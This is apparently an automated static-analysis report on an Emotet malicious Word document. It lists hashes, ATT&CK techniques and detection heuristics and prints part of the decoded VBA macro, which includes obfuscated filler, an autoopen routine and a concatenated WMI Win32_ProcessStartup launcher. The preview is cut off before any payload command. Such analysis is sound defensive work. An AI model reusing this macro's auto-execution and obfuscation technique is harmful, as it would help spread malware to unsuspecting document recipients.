Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 61363331b4ed5c21…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 159.0 KB
Created: 2019-05-02 13:11:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: dc5a7a21ddce76da8ae22f2a3f145de4
SHA-1: 8b23a62029eb98ce44a9183ac64bd682356ad065
SHA-256: 61363331b4ed5c211a5108f4820e0e7b31451bb9fb50da87d537b88e01159528
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, and triggers critical heuristics for WMI process creation. This indicates the macro is designed to launch a secondary payload. The ClamAV signature explicitly identifies it as Emotet, a known banking trojan and downloader.

Heuristics (7)

  • ClamAV: Doc.Malware.Emotet-6960319-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-6960319-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27709 bytes
SHA-256: 41fac209311f24e9858e0b4de5bb970c035309171e1b5eda3c96fc2f21a08c59

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "i_7_49"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "W452789"
Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w5417665"

Attribute VB_Name = "P71257"
Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w_8365_6"
Function k45__2(V4_600)
   Select Case N37503
Case o98_12 = F5_979 = Sgn(915663398)
Case R46_782 = U8499112
Case Y613_6 = Log(s3964_17)
Case J31742 = CBool(770043342)
Case O8095892 = 948052885
Case Z64_45 = CDate(Q49329_9)
End Select
   Select Case i3872843
Case v7__1366 = K865519 = Sgn(219551326)
Case n035125 = i5451_5
Case K85848 = Log(l3210249)
Case S7_001 = CBool(993609842)
Case u456_2 = 541530122
Case I16601 = CDate(S584_7)
End Select
Set k45__2 = CVar(V4_600)
   Select Case O68469
Case j4_18073 = z961953_ = Sgn(260716006)
Case f642160 = W24996
Case S449731 = Log(N931660)
Case m80858 = CBool(34746207)
Case t694450 = 596061870
Case w133453 = CDate(z0756884)
End Select
   Select Case D6917810
Case P00_173 = w4660_1 = Sgn(182749233)
Case r31422 = A79538
Case l30051__ = Log(i_01765)
Case N379985 = CBool(173061214)
Case Z2950394 = 759976378
Case O2_6754_ = CDate(B73092)
End Select
End Function
Sub autoopen()
   Select Case s_8_45_3
Case f6028821 = T78_36 = Sgn(89678378)
Case b67158_4 = o1776794
Case s97216 = Log(l904537)
Case V5595338 = CBool(147661988)
Case H4530329 = 941363160
Case v5771_ = CDate(R_27500)
End Select
   Select Case B46719
Case B902772 = c1031__2 = Sgn(583902484)
Case i13034 = T23150_
Case N650_80 = Log(p_4766_7)
Case b_03_669 = CBool(361303888)
Case W296015 = 171051730
Case U266930 = CDate(E9018653)
End Select
   Select Case T145343
Case R655895 = p086_2 = Sgn(21578397)
Case I7101639 = p_0264_6
Case W1992260 = Log(J41512)
Case Y030385 = CBool(302452967)
Case L2_70552 = 810010039
Case v15_675_ = CDate(S16138)
End Select
Call F7_2116
   Select Case p90899
Case I28781_ = P848_25 = Sgn(379163554)
Case b6364785 = m44227
Case B877458 = Log(V07546)
Case A_85__ = CBool(546830911)
Case f_4274 = 339284241
Case h4_2005 = CDate(i28506)
End Select
   Select Case t_6993
Case q4392_ = w8_2274 = Sgn(35180138)
Case f55071 = z64247_
Case N64_187 = Log(O_03856)
Case q8_92_7 = CBool(4062587)
Case r45253 = 17643203
Case F7898_9_ = CDate(r078_215)
End Select
   Select Case z73643
Case G38789 = n2_8048 = Sgn(882778830)
Case E030459_ = M4948_2
Case a62_24 = Log(n38_45)
Case l03_49 = CBool(663889470)
Case G647__24 = 608058999
Case z01774 = CDate(J80023_1)
End Select
End Sub

Attribute VB_Name = "W136440"
Function F7_2116()
On Error Resume Next
   Select Case F86813
Case B0587_35 = f63365_ = Sgn(280587394)
Case H320_130 = K513_37
Case H576021 = Log(J1997479)
Case k795156 = CBool(185070932)
Case N30796 = 418098894
Case M8014848 = CDate(m826_8_5)
End Select
   Select Case P_557_
Case H343062 = F758_627 = Sgn(487222661)
Case z90_322 = T24537
Case I_5793 = Log(D44540)
Case D74541 = CBool(798423184)
Case I4_316 = 335236939
Case W7613608 = CDate(m7_71347)
End Select
Set M_375173 = k45__2(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
   Select Case M50341
Case U21241_8 = I25938 = Sgn(64998561)
Case z97864 = j30_438
Case q609925 = Log(a05332)
Case S2067906 = CBool(33
... (truncated)